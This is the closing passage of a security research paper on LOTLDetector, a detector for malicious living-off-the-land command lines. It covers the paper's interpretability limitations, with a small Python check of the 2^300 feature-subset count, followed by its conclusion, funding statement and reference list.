Model interpretability. As machine learning models are increasingly applied across various fields, model interpretability has gradually become a focal point for researchers. Numerous studies are dedicated to enhancing the interpretability of machine learning models using SHAP (SHapley Additive exPlanations) and LIME (Local Interpretable Model-agnostic Explanations) (Arreche et al. 2024; Hariharan et al. 2023). The core objective of these methods is to answer the critical question: why does the model make a specific prediction for a particular input, and which features drive the prediction result? This highlights the importance of the interpretability of model outcomes. On deeper evaluation, we found that using SHAP for feature importance assessment requires considering all possible feature combinations to calculate Shapley values. When dealing with high-dimensional Word2Vec vectors, however, calculating all possible combinations becomes extremely impractical: for a 300-dimensional vector, the number of feature combinations reaches 2^300 (on the order of 10^90), which is computationally infeasible. LIME, for its part, generates perturbed samples locally to fit a simple surrogate model, but the high dimensionality and non-linear characteristics of Word2Vec vectors pose significant challenges for generating perturbed samples and for the subsequent interpretation: minor changes to certain dimensions of a Word2Vec vector may lead to unpredictable changes in the model output, making it difficult for LIME to explain the model's behavior accurately. Given these circumstances, the interpretability of model results is undoubtedly one of the important directions for our future research. With the rapid development of large model technologies, we plan to explore their use to enhance the interpretability of our results, in the hope of achieving breakthrough progress in this field.
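The scale of the combinatorial explosion facing exact Shapley value computation can be checked directly; this is a quick sanity check, not part of LOTLDetector:

```python
# Every feature is either included in or excluded from a coalition, so a
# 300-dimensional embedding yields 2**300 possible feature subsets.
n_features = 300
n_subsets = 2 ** n_features

# Roughly 2 x 10**90 subsets: far beyond any feasible enumeration.
digits = len(str(n_subsets))
print(f"2**{n_features} has {digits} decimal digits")
```

This is why practical SHAP implementations rely on sampling-based approximations rather than exact enumeration.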
Conclusion
This paper investigates the problem of detecting malicious command lines based on individual command lines. We propose a method for detecting malicious command lines called the LOTLDetector, which works by integrating expert knowledge and deep learning techniques. Specifically, the LOTLDetector utilizes command-line rules designed by security experts. It then creates a detection model for malicious command lines by jointly learning expert knowledge and completing command line text sequences. Through a series of experiments with command-line data collected from actual production environments and online resources, we have demonstrated that the LOTLDetector’s performance is significantly better than existing detection methods that rely solely on command-line text sequences, as well as those that rely solely on expert knowledge. The LOTLDetector also shows good adaptability in detecting new malicious command lines. This paper also discusses the limitations of the current work from two perspectives: the context of the command line environment and model interpretability, while outlining potential directions for future research.
Acknowledgements
We sincerely thank all those who provided help and support during the research for this article.
Author contributions
All authors have contributed to this manuscript and approve of this submission.
Funding
This work is supported in part by the following grants: Wenzhou Basic Scientific Research Projects under Grant No. G20240033; National Natural Science Foundation of China under Grant Nos. 62002324 and 62372410; Zhejiang Provincial Natural Science Foundation of China under Grant No. LQ21F020016; the Fundamental Research Funds for the Provincial Universities of Zhejiang under Grant No. RF-A2023009; Wenzhou Key Scientific and Technological Projects under Grant No. ZG2024007; and the "Pioneer" and "Leading Goose" R&D Program of Zhejiang under Grant Nos. 2025C01082 and 2025C01013.
Data availability
We will consider providing our experimental data to readers upon request.
Declarations
Conflict of interest
The authors declare that they have no known competing financial interests or personal relationships that could have appeared to influence the work reported in this paper.
Publisher's Note
Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
References
Alsulami B, Srinivasan A, Dong H, Mancoridis S (2017) Lightweight behavioral malware detection for windows platforms. In: 2017 12th international conference on malicious and unwanted software (MALWARE), pp 75–81
Arreche, O; Guntur, T; Abdallah, M. Xai-ids: toward proposing an explainable artificial intelligence framework for enhancing network intrusion detection systems. Appl Sci; 2024; 14,
Barr-Smith F, Ugarte-Pedrero X, Graziano M, Spolaor R, Martinovic I (2021) Survivalism: systematic analysis of windows malware living-off-the-land. In: 2021 IEEE symposium on security and privacy (SP), pp 1557–1574. IEEE
Bohannon D. cmd.exe command obfuscation generator & detection test harness. https://github.com/danielbohannon/invoke-dosfuscation
Bohannon D. Revoke-obfuscation. https://github.com/danielbohannon/revoke-obfuscation
Boros T, Cotaie A, Stan A, Vikramjeet K, Malik V, Davidson J (2022) Machine learning and feature engineering for detecting living off the land attacks. In: IoTBDS, pp 133–140
Chen, T; Zeng, H; Lv, M; Zhu, T. Ctimd: cyber threat intelligence enhanced malware detection using API call sequences with parameters. Comput. Secur.; 2024; 136, [DOI: https://dx.doi.org/10.1016/j.cose.2023.103518] 103518.
Crowdstrike 2024 global threat report. https://www.crowdstrike.com/global-threat-report/
Ding K, Zhang S, Yu F, Liu G (2023) Lolwtc: A deep learning approach for detecting living off the land attacks. In: 2023 IEEE 9th international conference on cloud computing and intelligent systems (CCIS), pp 176–181. IEEE
Downing E, Mirsky Y, Park K, Lee W (2021) DeepReflect: Discovering malicious functionality through binary reconstruction. In: 30th USENIX security symposium (USENIX Security 21), pp 3469–3486
Exploring the depths of cmd.exe obfuscation and detection techniques. https://i.blackhat.com/briefings/asia/2018/asia-18-bohannon-invoke_dosfuscation_techniques_for_fin_style_dos_level_cmd_obfuscation-wp.pdf
Fang V (2018) Malicious powershell detection via machine learning
Fang, Y; Zhou, X; Huang, C. Effective method for detecting malicious powershell scripts based on hybrid features. Neurocomputing; 2021; 448, pp. 30-39. [DOI: https://dx.doi.org/10.1016/j.neucom.2021.03.117]
Hariharan, SRR; Rejimol, R; Rendhir, PR; Ciza, T; Balakrishnan, N. Xai for intrusion detection system: comparing explanations based on global and local scope. J Compu Virol Hack Tech; 2023; 19,
Helpsystems. Cobalt strike—adversary simulation and red team operations. https://www.cobaltstrike.com
Hendler D, Kels S, Rubin A (2018) Detecting malicious powershell commands using deep neural networks. In: Proceedings of the 2018 on Asia conference on computer and communications security, pp 187–197
Hendler D, Kels S, Rubin A (2020) Amsi-based detection of malicious powershell code using contextual embeddings. In: Proceedings of the 15th ACM Asia conference on computer and communications security, pp 679–693
Joulin A, Grave E, Bojanowski P, Mikolov T (2016) Bag of tricks for efficient text classification. arXiv preprint arXiv:1607.01759
Devlin J, Chang MW, Lee K, Toutanova K (2018) BERT: pre-training of deep bidirectional transformers for language understanding. arXiv preprint. arXiv:1810.04805
Li Z, Chen QA, Xiong C, Chen Y, Zhu T, Yang H (2019) Effective and light-weight deobfuscation and semantic-aware attack detection for powershell scripts. In: Proceedings of the 2019 ACM SIGSAC conference on computer and communications security, pp 1831–1847
Liu S, Peng G, Zeng H, Fu J (2023) A survey on the evolution of fileless attacks and detection techniques. Comput Secur 103653
Liu C, Xia B, Yu M, Liu Y (2018) Psdem: a feasible de-obfuscation method for malicious powershell detection. In: 2018 IEEE symposium on computers and communications (ISCC), pp 825–831. IEEE
Living off the land binaries and scripts. https://informationsecurityasia.com/zh-cn/what-is-lolbas/#real-world_instances_of_lolbas_attacks_and_their_consequences
Living off the land: how to defend against malicious use of legitimate utilities (2022). https://threatpost.com/living-off-the-land-malicious-use-legitimate-utilities/177762/
Loflcab. https://lofl-project.github.io/
Lolbas, living off the land binaries, scripts and libraries. https://lolbas-project.github.io/
Malandrone GM, Virdis G, Giacinto G, Maiorca D, et al (2021) Powerdecode: a powershell script decoder dedicated to malware analysis. In: Proceedings of the Italian conference on cybersecurity, ITASEC 2021, vol 2940, pp 219–232
Metasploit. https://www.metasploit.com/
Microsoft. What is powershell?-powershell—microsoft docs. https://docs.microsoft.com/en-us/powershell/scripting/overview
Mikolov T (2013) Efficient estimation of word representations in vector space. arXiv preprint arXiv:1301.3781
Mitre. mitre att&ck framework. https://attack.mitre.org/
Ning R, Bu W, Yang J, Duan S (2023) A survey of detection methods research on living-off-the-land techniques. In: 2023 IEEE international conference on sensors, electronics and computer engineering (ICSECE), pp 159–164. IEEE
Ongun T, Stokes JW, Or JB, Tian K, Tajaddodianfar F, Neil J, Seifert C, Oprea A, Platt JC (2021) Living-off-the-land command detection using active learning. In: Proceedings of the 24th international symposium on research in attacks, intrusions and defenses, pp 442–455
Powersploit, a powershell post-exploitation framework. https://github.com/powershellmafia/powersploit
Rakhlin, A. Convolutional neural networks for sentence classification. GitHub; 2016; 6, 25.
Rusak G, Al-Dujaili A, O’Reilly U-M (2018) Ast-based deep learning for detecting malicious powershell. In: Proceedings of the 2018 ACM SIGSAC conference on computer and communications security, pp 2276–2278
Tsai, MH; Lin, CC; He, ZG; Yang, WC; Lei, CL. Powerdp: de-obfuscating and profiling malicious powershell commands with multi-label classifiers. IEEE Access; 2022; 11, pp. 256-270. [DOI: https://dx.doi.org/10.1109/ACCESS.2022.3232505]
Ugarte D, Maiorca D, Cara F, Giacinto G (2019) Powerdrive: accurate de-obfuscation and analysis of powershell malware. In: Detection of intrusions and malware, and vulnerability assessment: 16th international conference, DIMVA 2019, Gothenburg, Sweden, 2019, Proceedings 16, pp 240–259. Springer
Vaswani A (2017) Attention is all you need. Adv Neural Inf Process Syst
Wadcoms. https://wadcoms.github.io/
Wueest C, Anand H (2017) Internet security threat report-living off the land and fileless attack techniques
Yamin MM, Katt B (2019) Detecting malicious windows commands using natural language processing techniques. In: Innovative security solutions for information technology and communications: 11th international conference, SecITC 2018, Bucharest, Romania, Revised Selected Papers 11, pp 157–169. Springer
Yang, X; Peng, G; Zhang, D; Gao, Y; Li, C. Powerdetector: malicious powershell script family classification based on multi-modal semantic fusion and deep learning. China Commun; 2023; 20,
© The Author(s) 2026. This work is published under http://creativecommons.org/licenses/by/4.0/ (the “License”).